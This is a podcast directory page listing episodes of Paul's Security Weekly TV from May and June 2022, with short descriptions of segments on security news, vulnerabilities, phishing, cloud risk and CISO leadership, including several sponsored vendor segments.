Paul's Security Weekly TV

Follow Paul's Security Weekly TV
Share on
Copy link to clipboard

Security news, interviews, how-to technical segments. For security professionals by security professionals. We Hack Naked.

Security Weekly


    • Jun 28, 2022 LATEST EPISODE
    • daily NEW EPISODES
    • 38m AVG DURATION
    • 3,138 EPISODES


    Search for episodes from Paul's Security Weekly TV with a specific topic:

    Latest episodes from Paul's Security Weekly TV

    More Fuzzing, a Decade of OT Security, & Top Threats to Cloud Computing - ASW #202

    Play Episode Listen Later Jun 28, 2022 37:58

    This week in the AppSec News: Lessons learned from fuzzing, OT:ICEFALL report on insecure designs, CSA's Top Threats to Cloud Computing, Twitter apologizes for misusing data collection, & State of Open Source Security report!   Visit https://www.securityweekly.com/asw for all the latest episodes! Show Notes: https://securityweekly.com/asw202

    How GraphQL & Template Injection Threats Influence App Architectures - Mike Benjamin - ASW #202

    Play Episode Listen Later Jun 27, 2022 37:21

    Both GraphQL and template engines have the potential for injection attacks, from potentially exposing data due to weak authorization in APIs to the slew of OGNL-related vulns in Java this past year. We take a look at both of these technologies in order to understand the similarities in what could go wrong, while also examining the differences in how each one influences modern application architectures.   Visit https://www.securityweekly.com/asw for all the latest episodes! Show Notes: https://securityweekly.com/asw202

    Stopping Phishing Attacks & A Fresh Approach to Reducing Cyber Risk - Chris Cleveland, Mehul Revankar - ESW #278

    Play Episode Listen Later Jun 25, 2022 32:43

    PIXM stops phishing attacks at point of click with computer vision in the browser, protecting users from phishing beyond the mailbox in any application. With the launch of PIXM Mobile, PIXM is now delivering this capability on iPhones as well as desktop devices. Segment Resources: https://pixmsecurity.com/mobile/ This segment is sponsored by Pixm. Visit https://securityweekly.com/pixm to learn more about them!   The rise in disclosed vulnerabilities, the speed they are weaponized, and the cyber talent shortage have left teams struggling to wade through a mountain of vulnerabilities. In this discussion, Mehul will discuss the need for a new way to cut through the noise to focus teams on prioritizing and fixing those critical vulnerabilities that will most reduce risk in each organization's environment. He'll also cover how Qualys is redefining risk and vulnerability management in the latest version of VMDR and share stories of how customers have leveraged this solution to dramatically reduce risk. Segment Resources: www.qualys.com/trurisk www.qualys.com/vmdr This segment is sponsored by Qualys. Visit https://securityweekly.com/qualys to learn more about them!   Visit https://www.securityweekly.com/esw for all the latest episodes! Show Notes: https://securityweekly.com/esw278

    IBM Acquires Randori, Quantum Devices, Microsoft Defender, & RapidFort - ESW #278

    Play Episode Listen Later Jun 25, 2022 40:29

    Then, in the enterprise security news, CyberInt raises $28M for attack surface detection, RapidFort raises $8.5M for… pre-attack surface detection? Managing and monitoring your quantum devices? Making sure you don't lose access to your crypto wallets, IBM acquires Randori, Contrast Security makes some of their tools free, Rumble adds more interesting new features, Microsoft Defender for everyone, and more!   Visit https://www.securityweekly.com/esw for all the latest episodes! Show Notes: https://securityweekly.com/esw278

    Plastic Bags, NSA Playsets, Megs Insecure, PHP Strikes Back, & Gamification - PSW #745

    Play Episode Listen Later Jun 24, 2022 117:23

    In the Security News for this week: appliances with holes, gamification and its pitfalls, false rocket sirens, PHP strikes again, new laws we may actually agree with, hacking jacuzzis, Icefall and the state of ICS security, Adobe is blocking anti-virus, Mega is Mega insecure, Microcorruption CTF and DIY NSA playset!   Visit https://www.securityweekly.com/psw for all the latest episodes! Show Notes: https://securityweekly.com/psw745

    Breaking Through Vendor Barriers: Product Data as a Service - Tim Morris - ESW #278

    Play Episode Listen Later Jun 24, 2022 41:22

    Introducing the concept of Tanium Data as a Service. When you've got a product like Tanium, that collects so much useful data - why would you want to keep it within Tanium? The 'Data-as-a-Service' model aims to increase the value of the Tanium product by safely sharing its data with other teams, tools, and groups within a customer's organization.   This segment is sponsored by Tanium. Visit https://securityweekly.com/tanium to learn more about them!   Visit https://www.securityweekly.com/esw for all the latest episodes! Show Notes: https://securityweekly.com/esw278

    Lacework Layoffs, Anti-Hacking Law, The Security Study Plan, & StackZone - ESW #275

    Play Episode Listen Later Jun 24, 2022 49:56

    This week in the Enterprise News: Lacework lays off approx 300 employees, US Narrows Scope of Anti-Hacking Law Long Hated by Critics, Security Study Plan, DevSecOps Vulnerability Management by Guardrails, StackZone, Cipherloc Acquires vCISO Security Services Provider SideChannel, Broadcom to Buy VMware for $61 Billion in Record Tech Deal, Cyscale raises EUR 3 million in Seed Funding Round, & more!   Visit https://www.securityweekly.com/esw for all the latest episodes! Show Notes: https://securityweekly.com/esw275

    Learning Should Be Fun - Sam Bowne - PSW #745

    Play Episode Listen Later Jun 24, 2022 66:18

    Many people think security is too difficult to learn because it is such a big field, and constantly growing. But it's endlessly fascinating and surprising, once you learn some fundamentals and get used to feeling stupid. My task is to help people get started, and learn how to appreciate this complex and challenging topic.   Segment Resources: https://samsclass.info/ https://infosecdecoded.com/   Visit https://www.securityweekly.com/psw for all the latest episodes! Show Notes: https://securityweekly.com/psw745

    The 3 Ts (Truth, Transparence, Trust), 4 Leadership Strategies, & 5 Best Predictors - BSW #264

    Play Episode Listen Later Jun 22, 2022 30:51

    In the Leadership and Communications section, Uber CISO's trial underscores the importance of truth, transparency, and trust, 4 Leadership Strategies to Help Women Advance in the Tech Industry, 5 Best Predictors of Employee Turnover and What Leaders Should Do About Them, and more!   Visit https://www.securityweekly.com/bsw for all the latest episodes! Show Notes: https://securityweekly.com/bsw264

    Hertzbleed, SynLapse, Java Deserialization, More MFA, Firmware Flaws, & Zombie 0-Day - ASW #201

    Play Episode Listen Later Jun 22, 2022 31:15

    This week in the AppSec News: SynLapse shows shell injection via ODBC, Java deserialization example, MFA for Ruby Gems ecosystem, simple flaws in firmware, the decade-long journey of a Safari vuln, & more!   Visit https://www.securityweekly.com/asw for all the latest episodes! Show Notes: https://securityweekly.com/asw201

    IE11 Goes to Zero -- A History of Browser Security and Bug Bounties - ASW #201

    Play Episode Listen Later Jun 21, 2022 32:52

    IE has gone to 11 and is no more. There's some notable history related to IE11 and bug bounty programs. In 2008, Katie Moussouris and others from Microsoft announced their vulnerability disclosure program. In 2013 this evolved into a bug bounty program piloted with IE11, with award ranges from $500 to $11,000. Ten years later, that bounty range is still common across the industry. The technical goals of the program remain similar as well -- RCEs, universal XSS, and sandbox escapes are all vulns that can easily gain $10,000+ (or an order of magnitude greater) in modern browser bounty programs. So, even if we've finally moved on from a browser with an outdated security architecture, we're still dealing with critical patches in modern browsers. Fortunately, the concept of bounty programs continues.   References: - https://www.blackhat.com/presentations/bh-usa-08/Reavey/MSRC.pdf - https://media.blackhat.com/bh-usa-08/video/bh-us-08-Reavey/black-hat-usa-08-reavey-securetheplanet-hires.m4v - https://web.archive.org/web/20130719064943/http://www.microsoft.com/security/msrc/report/IE11.aspx - https://web.archive.org/web/20190507215514/ https://blogs.technet.microsoft.com/bluehat/2013/07/03/new-bounty-programs-one-week-in/   Visit https://www.securityweekly.com/asw for all the latest episodes! Show Notes: https://securityweekly.com/asw201

    The Board's Role In Cybersecurity - Brandon Dunlap - BSW #266

    Play Episode Listen Later Jun 19, 2022 25:17

    With recent proposed rule making from he SEC, there is increased focus on the Board's involvement in governing and managing cybersecurity. What is changing in how effective CISO's engage with their Board of Directors and what is over the horizon for cybersecurity leaders?   Visit https://www.securityweekly.com/bsw for all the latest episodes! Show Notes: https://securityweekly.com/bsw266

    Inside the CISO's Office - John Bruggeman - BSW #266

    Play Episode Listen Later Jun 18, 2022 30:30

    What does a CISO do all day? Do they eat bon-bons and read the WSJ? Do they read Threatpost or BleepingComputer or Twitter? Why does a company need a CISO, or better still, do they need one? All these questions and more will be answered in this weeks episode. Segment Resources: https://www.cbts.com/security/security-services/ https://www.cbts.com/blog/cloud-security-controls-mitigate-risk/ https://www.cbts.com/blog/weighing-risks-benefits-moving-to-the-cloud-part-1/ https://www.cbts.com/blog/what-is-cyber-insurance/   Visit https://www.securityweekly.com/bsw for all the latest episodes! Show Notes: https://securityweekly.com/bsw266

    Transforming Cybersecurity Marketing & How the Internet Became Corporate Network - Amit Bareket, Gianna Whitver - ESW #277

    Play Episode Listen Later Jun 18, 2022 31:16

    We will cover high level winning strategies in cybersecurity marketing. The do's and don'ts for our specific industry and key factors of success in a go to market strategy.   Segment Resources: https://cybersecuritymarketingsociety.com/podcast/ https://insight.cybersecuritymarketingsociety.com/survey2021?_gl=1*1wcqhp6*_ga*MTg4ODExOTY2Ny4xNjU0MTc1NDM3*_ga_GS9X0J5FZC*MTY1NDE3NTQzNi4xLjEuMTY1NDE3NTU3MC4w&_ga=2.81844830.933834121.1654175437-1888119667.1654175437   This segment is sponsored by Perimeter 81. Visit https://securityweekly.com/perimeter81 to learn more about them!   Two important shifts over the last two years transformed what we once knew as an on-premise ecosystem into a global system accessible from anywhere. One is remote work, which began as a temporary measure to get us through the early days of the pandemic and has since become the norm. The other is cloud adoption, which was mainstream even before the pandemic, but has seen another bump in the last two years. As a result, the internet has become the new corporate network. Where do we go from here?   This segment is sponsored by Perimeter 81. Visit https://securityweekly.com/perimeter81 to learn more about them!   Visit https://www.securityweekly.com/esw for all the latest episodes! Show Notes: https://securityweekly.com/esw277

    The Evolving Phishing Threat & Protect Valuable Data as Workforce Volatility Rages - ESW #277

    Play Episode Listen Later Jun 18, 2022 33:11

    Phishing attacks are increasingly focused on new vectors such as social media, business collaboration apps, and text messages. These vectors generally lack any protection for the end user. How can we protect against these attacks that are increasingly leading to costly breaches? This segment is sponsored by Pixm. Visit https://securityweekly.com/pixm to learn more about them!   Employee turnover is the biggest threat to any organization's IP. Nearly 60% of employees move to a new company within similar fields (think: competitors) and are using collaboration technology to take sensitive data at an alarming rate. Code42's Joe Payne will discuss how Insider Risk Management addresses data loss in a volatile job market while still enabling collaboration. This segment is sponsored by Code42. Visit https://securityweekly.com/code42 to learn more about them!   Visit https://www.securityweekly.com/esw for all the latest episodes! Show Notes: https://securityweekly.com/esw277

    Big DDOS, Tracking Smartphones, BIOS Doom, NSO Buyer, & Android Children - PSW #744

    Play Episode Listen Later Jun 17, 2022 103:22

    This week in the Security News: Big DDOS, tracking smartphones, play Doom in your BIOS, hertzbleed, Apple M1 vulnerability, who will buy NSO, spoof your location data, building system attacks, and a hacker's revenge!   Visit https://www.securityweekly.com/psw for all the latest episodes! Show Notes: https://securityweekly.com/psw744

    Azure Vulns, Vendor Layoff's, Rob Lee, & Bye Bye Internet Explorer - ESW #277

    Play Episode Listen Later Jun 17, 2022 70:59

    This week, in the Enterprise News: Vanta raises a $110M Series B to automate SOC 2, ISO, PCI and other compliance efforts Immuta raises a $100M Series E for secure data access (an everything-old-is-new-again market that's exploding) Perimeter 81 raises $100M Series C and becomes a unicorn - You get a VPN! I get a VPN! Everyone gets a VPN! Over a dozen other vendors raise funding! IBM acquires EASM vendor, Randori Another Azure vulnerability allowing tenancy escapes Microsoft's Purview goes beyond DLP and gets into the pre-crime business Half a dozen cybersecurity vendor layoff announcements! We discuss the controversy around Rob Lee's involvement with developing federal standards for critical infrastructure protection and we say farewell (and good riddance) to Internet Explorer… but not really Then, after the news, we're going to air some segments recorded at the RSA conference last week.   Visit https://www.securityweekly.com/esw for all the latest episodes! Show Notes: https://securityweekly.com/esw277

    We Help The Helpers; You Can Too! - Ray Davidson - PSW #744

    Play Episode Listen Later Jun 17, 2022 59:16

    Michigan has a group of volunteers who assist local governments and public services with incident response. The program is relatively mature, and will be presented (along with those of Ohio and Wisconsin) at the upcoming National Governors Association Cybersecurity Summit. Come hear the interview and scoop the governors!   Segment Resources: Our home page http://micybercorps.org Our supporting legislation https://www.legislature.mi.gov/documents/mcl/pdf/mcl-Act-132-of-2017.pdf Our partner organization https://www.michigan.gov/dtmb/services/cybersecurity/cyber-partners Key article in moving our development forward - https://warontherocks.com/2018/01/estonias-approach-cyber-defense-feasible-united-states/ An article with more info https://www.lawfareblog.com/bridging-state-level-cybersecurity-resources   Visit https://www.securityweekly.com/psw for all the latest episodes! Show Notes: https://securityweekly.com/psw744

    OWASP Top 10 for K8s, Firefox Process Isolation, Secure Software Factory, CFAA Policy - ASW #198

    Play Episode Listen Later Jun 15, 2022 35:01

    This week in the AppSec News: OWASP Top 10 for Kubernetes, Firefox improves security with process isolation, CNCF releases guidance on Secure Software Factories and Cloud Native Security, & the DOJ clarifies its policy on CFAA!   Visit https://www.securityweekly.com/asw for all the latest episodes! Show Notes: https://securityweekly.com/asw198

    The Psychology of Training - Matias Madou - ASW #198

    Play Episode Listen Later Jun 15, 2022 36:48

    Developers want bug-free code -- it frees up their time and is easier to maintain. They want secure code for the same reasons. We'll talk about how the definition of secure coding varies among developers and appsec teams, why it's important to understand those perspectives, and how training is just one step towards building a security culture.   Visit https://www.securityweekly.com/asw for all the latest episodes! Show Notes: https://securityweekly.com/asw198

    Defining Cyber Risk & Is the Market Ready for Integrated Cyber Risk Management? - BSW #265

    Play Episode Listen Later Jun 14, 2022 29:49

    Defining Cyber Risk With Bryan Ware This year, RSAC is happening amidst the backdrop of major geopolitical tensions with cyber impacts; a continued, lingering pandemic and a potential economic downturn that cyber adversaries can and have leveraged to their benefit; and increasing technological innovation. All of this points toward ever-evolving cyber risk. What are some of the key considerations that executives – both ones with cyber expertise and ones without – should keep in mind as they look to not only define cyber risk but also reduce it and ensure operational resiliency? In this segment, we'll hear thoughts from Bryan Ware, the new CEO of LookingGlass Cyber Solutions, former CEO of Next5, a business intelligence and advisory firm, and the first presidentially appointed Assistant Director of Cybersecurity at the Cybersecurity and Infrastructure Security Agency (CISA) at the Department of Homeland Security (DHS).   This segment is sponsored by LookingGlass Cyber. Visit https://securityweekly.com/lookingglass to learn more about them!   Is the Market Ready for Integrated Cyber Risk Management? Cyber risk management is now a dynamic practice for security teams and leadership. It requires up-to-date risk intelligence across many factors – external, internal, third parties, cloud posture – to inform the right decisions and enable cyber risk quantification and risk modeling to be more dynamic. Victor will discuss what drove him to leave security leadership and start a company to solve the problems he experienced with cyber risk management and how the market is responding.   Segment Resources: https://fortifydata.com/request-an-assessment   This segment is sponsored by FortifyData. Visit https://securityweekly.com/fortifydata to learn more about them!   Visit https://www.securityweekly.com/bsw for all the latest episodes! Show Notes: https://securityweekly.com/bsw265

    What's Happening with SCIM - Paul Lanzi - ESW #275

    Play Episode Listen Later Jun 14, 2022 28:49

    There are a few IETF standards that make the identity world go 'round. SAML, FIDO and LDAP are ones that we know and love... but there's one particularly un-loved standard that is the glue between most identity systems -- cloud and on-prem -- out there. It's called SCIM and -- good news -- smart people are working on improving this 10+ year old standard. Big changes coming, and here to talk with us about it is Paul Lanzi...   Segment Resources: https://identiverse.com/idv2022/ (Paul on Wednesday)   Visit https://www.securityweekly.com/esw for all the latest episodes! Show Notes: https://securityweekly.com/esw275

    RSAC Micro Interviews - Cisco & Invicti Security - Jeetu Patel, Sonali Shah - ASW #200

    Play Episode Listen Later Jun 14, 2022 31:50

    Seamlessly Connect & Protect Entire IT Ecosystem The new business reality is that everything is connected, and everyone is vulnerable. In today's world, security resilience is imperative, and Cisco believes it requires an open, unified security platform that crosses hybrid multi-cloud environments. Our vision for the Cisco Security Cloud will reshape the way organizations approach and protect the integrity of the entire IT ecosystem.   Segment Resources: Cisco Security Resilience: https://www.cisco.com/c/en/us/products/security/security-resilience.html   This segment is sponsored by Cisco. Visit https://securityweekly.com/cisco to learn more about them!   The Culture Blindspot: Harmonizing DevSecOps Helps Curb Burnout Recent data shows that security and development teams are still stressed, and they're taking that stress home with them. Not only are they spending unnecessary hours addressing security issues that they could have otherwise prevented with modern tools and best practices, but also these teams are taking time out of their personal lives during holidays and on weekends to manage critical issues, contributing to burnout and ultimately churn. There's good news, though: relationships between security and development are steadily improving, and with the right support and modern tooling at hand, you can transform the lives of cybersecurity professionals while also boosting your organization's security posture, too.   This segment is sponsored by Invicti. Visit https://securityweekly.com/invicti to learn more about them!   Visit https://www.securityweekly.com/asw for all the latest episodes! Show Notes: https://securityweekly.com/asw200

    Boards & Cybersecurity, The New CISO Role, & Reskilling - BSW #265

    Play Episode Listen Later Jun 14, 2022 32:04

    In the Leadership and Communications section, Being concerned is not enough – What boards should know and do about cybersecurity, In the Case of Cybersecurity, the Best Defense is Education, Reskilling workers can help meet the cybersecurity staffing challenge, and more!   Visit https://www.securityweekly.com/bsw for all the latest episodes! Show Notes: https://securityweekly.com/bsw265

    HTTP RFCs Have Evolved, Breaking Into Cloud, Scaling AppSec at Netflix, & Confluence - ASW #200

    Play Episode Listen Later Jun 13, 2022 36:45

    HTTP RFCs have evolved: A Cloudflare view of HTTP usage trends, Career Advice and Professional Development, Active Exploitation of Confluence CVE-2022-26134   Visit https://www.securityweekly.com/asw for all the latest episodes! Show Notes: https://securityweekly.com/asw200

    Accelerating Security Response - Bill Bernard - ESW #275

    Play Episode Listen Later Jun 3, 2022 36:12

    In our research, 85% of security professionals attribute preventable business impacts to insufficient response practices. In this segment, Bill will discuss the key challenges slowing down response times, such as staffing challenges, alert quality, and organizational culture as primary factors slowing down response.   This segment is sponsored by deepwatch. Visit https://securityweekly.com/deepwatch to learn more about them!   Visit https://www.securityweekly.com/esw for all the latest episodes! Show Notes: https://securityweekly.com/esw275

    The Data Dilemma: Securing All Data at Scale - Dan Neault - BSW #264

    Play Episode Listen Later Jun 3, 2022 33:23

    Data is the most valuable resource on the planet; but, as businesses collect and store data at an astonishing pace, data sprawl, volume, and diverse storage environments create a security nightmare. With support for hundreds of data stores across leading cloud providers and thousands of automation and response integrations, Imperva Data Security Fabric modernizes and simplifies data governance, security, and workflow management for data in all forms across multicloud and hybrid environments. The product's flexible architecture supports structured, semi-structured, and unstructured data across a range of data repositories to ensure security policies are applied consistently everywhere so businesses can quickly understand and mitigate risk.   This segment is sponsored by Imperva. Visit https://securityweekly.com/imperva to learn more about them!   Visit https://www.securityweekly.com/bsw for all the latest episodes! Show Notes: https://securityweekly.com/bsw264

    ReliaQuest, Mimecast Delisted, 57th Unicorn, Expired Certs, & CyberSec Skill Crisis - ESW #276

    Play Episode Listen Later Jun 3, 2022 63:58

    Finally, in the Enterprise Security News, Funding is back, in preparation for RSA! Devo raises $100M and becomes our 56th unicorn, JupiterOne raises $70M and becomes our 57th unicorn! Open source projects get some security funding, 10 more funding announcements, Mimecast has been taken private and is now delisted from the NASDAQ, ReliaQuest acquires Digital Shadows, We talk about public and private market performance, The cybersecurity skills crisis gets worse, Expired certs + IoT devices = PAIN! All that and more, on this episode of Enterprise Security Weekly.   Visit https://www.securityweekly.com/esw for all the latest episodes! Show Notes: https://securityweekly.com/esw276

    Understanding WebApp Client-Side Security With Source Defense - Matt McGuirk - PSW #743

    Play Episode Listen Later Jun 3, 2022 58:46

    This segment will be an opportunity to discuss web application client-side security with subject matter expert Matt McGuirk from Source Defense. Modern web applications have a massive and misunderstood attack surface that exists within the webpages they serve. Potential discussion topics: - A visual overview of the problem - A simulated client-side attack - How to evaluate client-side risk on a given web site - What technologies are available to defend against client-side attacks - Historical case studies of landmark attacks   Segment Resources: "Magecart 101" - a courseware-style overview of the problem for security practioners: https://www.youtube.com/watch?v=T4al8idAE_M A quick five minute explainer on the problem and Source Defense's solution: https://www.youtube.com/watch?v=f8MO45EQcKY Source Defense's brand new (as of 5/25/22) "State of the Industry" report for client-side security: https://info.sourcedefense.com/third-party-digital-supply-chain-report-white-papere   This segment is sponsored by Source Defense. Visit https://securityweekly.com/sourcedefense to learn more about them!   Visit https://www.securityweekly.com/psw for all the latest episodes! Show Notes: https://securityweekly.com/psw743

    Charitable Ransomware, Year of Linux Malware, Follina MSDT, Twitter Fines, & Bounties - PSW #743

    Play Episode Listen Later Jun 3, 2022 111:20

    This week in the Security News: Analyzing chat logs with Python, consumer reports for IoT, hypothetically BS, the year of the Linux desktop and the year of Linux malware are the same, do you trust Google to tell you open-source software is secure?, Twitter fines, WSL attack vector, Follina, UK Government still won't pay a bounty, and ransomware that makes you a better person!   Visit https://www.securityweekly.com/psw for all the latest episodes! Show Notes: https://securityweekly.com/psw743

    Salesforce's Journey Towards Complete Customer MFA - Ian Glazer - ESW #276

    Play Episode Listen Later Jun 3, 2022 22:47

    In the Autumn of 2019, Salesforce started on an ambitious journey - to require all of their customers to use multi-factor authentication (MFA) as of February 2022. The journey required the collaboration of every product line and every business function within Salesforce. And the journey potentially required every single one of Salesforce's customer to deploy new technology and to change all of their user's behavior. Clearly this would be no simple journey, but it was one with massive rewards for everyone involved. Join Ian Glazer as he discusses the impetus for Salesforce's MFA push, the challenges of such a large scale endeavor, some of the setbacks and victories along the way, and, most importantly, what you can take from Salesforce's journey towards complete customer MFA adoption and apply it in your own organization.   Visit https://www.securityweekly.com/esw for all the latest episodes! Show Notes: https://securityweekly.com/esw276

    CEOs - Do You Know Where That Cyber Risk Report Came From? - Jerry Layden, Kevin Powers - BSW #263

    Play Episode Listen Later Jun 2, 2022 25:56

    Boards and CEOs are asking what their cyber risk posture is, and they aren't getting clear answers. Reports produced from assessments oftentimes are built on stale data rather than real-time compliance and risk data. How should C-levels be thinking about cybersecurity posture reporting, and how can they manage cyber risk in real-time as opposed to point-in-time?   This segment is sponsored by CyberSaint. Visit https://securityweekly.com/cybersaint to learn more about them!   Visit https://www.securityweekly.com/bsw for all the latest episodes! Show Notes: https://securityweekly.com/bsw263

    CISO MindMap 2022, Top CISO Strategies, & The Missing Link in Cybersecurity - BSW #263

    Play Episode Listen Later Jun 2, 2022 32:16

    In the leadership and communications section, CISO MindMap 2022: What do InfoSec Professionals really do?, CISO Shares Top Strategies to Communicate Security's Value to the Biz, Security leaders chart new post-CISO career paths, and more!   Visit https://www.securityweekly.com/bsw for all the latest episodes! Show Notes: https://securityweekly.com/bsw263

    Understanding Web Application Client-Side Risk - Matt McGuirk - ESW #276

    Play Episode Listen Later Jun 2, 2022 33:33

    Web applications have a new and dangerous security gap which requires attention: client-side security. The code and content that a web application delivers into a web browser is a ripe attack surface and requires different consideration, tools, and knowledge than required by traditional web application security. This segment will explore what client-side security is, why client-side attacks are so dangerous, and what options are available to defend ourselves from this new threat.   Segment Resources: "Magecart 101" - a courseware-style overview of the problem for security practioners: https://www.youtube.com/watch?v=T4al8idAE_M A quick five minute explainer on the problem and Source Defense's solution: https://www.youtube.com/watch?v=f8MO45EQcKY Source Defense's brand new (as of 5/25/22) "State of the Industry" report for client-side security: https://info.sourcedefense.com/third-party-digital-supply-chain-report-white-paper   This segment is sponsored by Source Defense. Visit https://securityweekly.com/sourcedefense to learn more about them!   Visit https://www.securityweekly.com/esw for all the latest episodes! Show Notes: https://securityweekly.com/esw276

    Evil Encryption, CyberSec Funding, Market Downturns, & Crypto Muggings - ESW #274

    Play Episode Listen Later May 21, 2022 39:35

    In the Enterprise Security News: The latest cybersecurity fundraising, We discuss the impact of the market downturn on the cybersecurity startup industry, Crypto muggings, Security researchers researching researchers simulating attackers, & Evil Encryption!    Visit https://www.securityweekly.com/esw for all the latest episodes! Show Notes: https://securityweekly.com/esw274

    Windows GPU Display Vulns, NFT Discord Hack, Costa Rica Vs. Hackers, & Initial Access - PSW #741

    Play Episode Listen Later May 21, 2022 77:01

    In the Security News for this week: Singapore launches safety rating system for e-commerce sites, Watch Out for Zyxel Firewalls RCE Vulnerability, New Bluetooth hack that can unlock your Tesla, Hackers Compromise a String of NFT Discord Channels, a pentester's attempt to be ‘as realistic as possible' backfires, & more!   Visit https://www.securityweekly.com/psw for all the latest episodes! Show Notes: https://securityweekly.com/psw741

    Where to Start Your Passwordless Journey? - Jackie Comp, Rolf Lindermann - ESW #274

    Play Episode Listen Later May 21, 2022 44:06

    Migrating off passwords and legacy authentication is a journey. Nok Nok has worked with global brands to incorporate passwordless, next-generation authentication into their consumer apps leading to significant improvements in onboarding, authentication success, speed and reduction in fraud among many other benefits. Learn how these organizations have mastered the transition.   Segment Resources: www.noknok.com https://www.youtube.com/watch?v=yQIwOx2XCSE   Visit https://www.securityweekly.com/esw for all the latest episodes! Show Notes: https://securityweekly.com/esw274

    Attack Intelligence, Collective Defense, & Trends to Watch - Michael Ehrlich - ESW #274

    Play Episode Listen Later May 20, 2022 32:57

    Attack intelligence delivers customers actionable, relevant, and timely information. Learn why Collective Defense is an integral aspect of attack intelligence and hear about the cyber trends you need to watch.   Segment Resources: https://www.ironnet.com/blog/what-is-attack-intelligence-and-why-do-you-need-it   Visit https://www.securityweekly.com/esw for all the latest episodes! Show Notes: https://securityweekly.com/esw274

    Firmware Security - Saumil Shah - PSW #741

    Play Episode Listen Later May 20, 2022 59:24

    In this segment Saumil Shah joins us for a discussion on Firmware Security, complete with a fascinating first-hand demonstration!   Visit https://www.securityweekly.com/psw for all the latest episodes! Show Notes: https://securityweekly.com/psw741

    Year in Cyber Review 2021 - Robert Lee - PSW #741

    Play Episode Listen Later May 19, 2022 57:21

    The past year has been filled with incredible changes in the cyber security landscape from ICS, Mobile, Cloud, and increased threats from Ransomware. This discussion will focus on crucial and quick discussions surrounding the cyber landscape that has changed quickly and forced organizations to consider revamping many of their policies and preparations. Join us for a humorous, and insightful journey back over the past year filled with examples for practitioners, organizations, and those just starting in cyber security.   Visit https://www.securityweekly.com/psw for all the latest episodes! Show Notes: https://securityweekly.com/psw741

    Typosquatting, Curl's Security Update, & OpenSSF's 10 Point Mobilization Plan - ASW #197

    Play Episode Listen Later May 18, 2022 40:22

    This week in the AppSec News: Typosquatting spreads to Rust, curl fixes flaws in mishandling dots and slashes, OpenSSF invests in a mobilization plan for open source, interesting appsec from Black Hat Asia.    Visit https://www.securityweekly.com/asw for all the latest episodes! Show Notes: https://securityweekly.com/asw197

    Developing Future Cybersecurity Contributors - Brian Glas - ASW #197

    Play Episode Listen Later May 18, 2022 39:26

    What does it look like to try teaching cybersecurity at an undergraduate level? What are the goals and challenges faced when trying to help future generations learn what they need to know to contribute to this industry?    Visit https://www.securityweekly.com/asw for all the latest episodes! Show Notes: https://securityweekly.com/asw197

    Becoming a Year Younger, Material Security, Tailscale, Radiflow, & Artic Wolf - ESW #273

    Play Episode Listen Later May 14, 2022 39:59

    In the Enterprise News for this week: Funding announcements from Material Security, Abnormal, Teleport, Tailscale, Smallsetp, Phylum and more. Acquisitions include HDiv Security, and Radiflow. New product announcements from Siren, Corelight, Artic Wolf, Onapsis and Aqua. And, in other news, all South Koreans are about to become one year younger, & more!   Visit https://www.securityweekly.com/esw for all the latest episodes! Show Notes: https://securityweekly.com/esw273

    Overcoming Challenges in Multinational Phishing Simulations - Omer Taran - ESW #273

    Play Episode Listen Later May 14, 2022 32:07

    According to CybeReady, during such turbulent times, one should regard all emails with extra caution and double-check the sender's address carefully. Beware of requests that ask for technical assistance such as running software or helping to take down websites. These might not only be illegal but may also be used to hack systems on the corporate network. Try to remember that during times of crisis, there is an increase in phishing attempts of all kinds as hackers take advantage of the situation. In this circumstance, employees need to stay updated from both a news and computing perspective. To be proactive in the defense of computing environments, our security experts recommend: 1. Personal computer and phones: Install the latest operating system and security updates. 2. Implement 2FA/MFA: Use a phone number or authentication app as the second factor of authentication to all important applications, social media accounts (Facebook/Meta, Linkedin, Twitter, etc.), and personal email accounts. Backup email and ensure it is recoverable. 3. Change Passwords: If you are reusing a password in sites that hold your personal information, it is a good time to change your passwords. 4. Support a Culture of Security: Train your employees continuously, advise friends and family to do the same, and take an active role in creating a safer internet. 5. Defend Work from Home Environments: Install the operating system and security updates. If these are available you should see a notification on your computer or phone. Especially important to business continuity in these times of uncertainty is the need for automated cybersecurity training that adapts to employee educational needs and accelerates the learning process.   Segment Resources: https://cybeready.com/blog https://cybeready.com/resource-center/playbook https://cybeready.com/ultimate-guide-to-phishing-protection   Visit https://www.securityweekly.com/esw for all the latest episodes! Show Notes: https://securityweekly.com/esw273

    Public Entities & Ransomware, Colonial Pipeline Fine, Nvidia's LHR Limiter, & BIG-IP - PSW #740

    Play Episode Listen Later May 13, 2022 104:04

    In the Security News for this week: Colonial Pipeline facing $1,000,000 fine, cybercrime tracking bill signed into law, Lincoln College Set to Close After Crippling Cyberattack, Nvidia's LHR limiter bypassed, & North Carolina Becomes the First State to Prohibit Public Entities from Paying Ransoms!   Visit https://www.securityweekly.com/psw for all the latest episodes! Show Notes: https://securityweekly.com/psw740

    Protecting Your Environment with Intel vPro® Platform - Yasser Rasheed - ESW #273

    Play Episode Listen Later May 13, 2022 29:19

    In this segment sponsored by Intel, we will explore all things Intel vPro® platform. Learn how Intel vPro® platform can help you keep your computers up-to-date, prevent attacks, provide reports on the status of the firmware in use, and implement advanced hardware security!   This segment is sponsored by Intel. Visit https://securityweekly.com/intel to learn more about them!   Visit https://www.securityweekly.com/esw for all the latest episodes! Show Notes: https://securityweekly.com/esw273

    Destructive Malware & Other Threats to Watch - Fleming Shi - PSW #740

    Play Episode Listen Later May 13, 2022 56:25

    In-depth look at destructive malware and other threats the Barracuda team has been monitoring that you need to be aware of.   This segment is sponsored by Barracuda Networks. Visit https://securityweekly.com/barracuda to learn more about them!   Visit https://www.securityweekly.com/psw for all the latest episodes! Show Notes: https://securityweekly.com/psw740

    5 Demands, 6 Best Practices, & 7 Deadly Sins - BSW #262

    Play Episode Listen Later May 11, 2022 31:29

    In the Leadership & Communications section: 6 information governance best practices, The Seven Deadly Sins Of Leadership, Secrets to building a healthy CISO-vendor partnership, & more!   Visit https://www.securityweekly.com/bsw for all the latest episodes! Show Notes: https://securityweekly.com/bsw262

    Cyber: The Fifth Domain of War - Mike Ernst - BSW #262

    Play Episode Listen Later May 10, 2022 25:35

